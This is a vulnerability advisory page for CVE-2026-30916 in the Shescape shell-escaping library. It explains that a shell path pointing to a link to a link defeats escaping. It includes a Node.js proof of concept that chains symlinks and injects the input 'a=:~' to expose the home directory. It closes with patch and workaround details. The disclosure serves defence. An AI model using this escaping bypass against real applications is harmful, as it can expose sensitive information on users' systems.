CVE-2026-30916 is a low severity vulnerability with a CVSS score of 0.0. No known exploits currently, and patches are available.
Very low probability of exploitation
EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.
This impacts users of Shescape that configure their shell to point to a file on disk that is a link to a link. The precise result of being affected depends on the actual shell used and incorrect shell identified by Shescape.
In particular, an attacker may be able to bypass escaping for the shell being used. This can result, for example, in exposure of sensitive information, consider the following proof of concept (targeting Shescape v2):
import fs from "node:fs";
import { exec } from "node:child_process";
import { Shescape } from "shescape";
import which from "which";
/* 1. Set up */
const shell = which.sync("bash");
const linkToShell = "./csh";
const linkToLink = "./link";
fs.rmSync(linkToLink, { force: true });
fs.rmSync(linkToShell, { force: true });
fs.symlinkSync(shell, linkToShell);
fs.symlinkSync(linkToShell, linkToLink);
/* 2. Misconfiguration */
const execOptions = {
shell: linkToLink,
};
const shescape = new Shescape({
shell: execOptions.shell,
});
/* 3. Payload */
const userInput = "a=:~";
/* 4. Attack example */
exec(
`echo Hello ${shescape.escape(userInput)}`,
{ shell: execOptions.shell },
(error, stdout) => {
fs.rmSync(linkToLink);
fs.rmSync(linkToShell);
if (error) {
console.error(`An error occurred: ${error}`);
} else {
console.log(stdout);
// Output: "Hello a=:/home/user"
}
},
);
This problem has been patched in v2.1.9 which you can upgrade to now.
If upgrading is not an option, either avoid using a shell or make sure the shell path you use is not a link to a link.
Please cite this page when referencing data from Strobes VI. Proper attribution helps support our vulnerability intelligence research.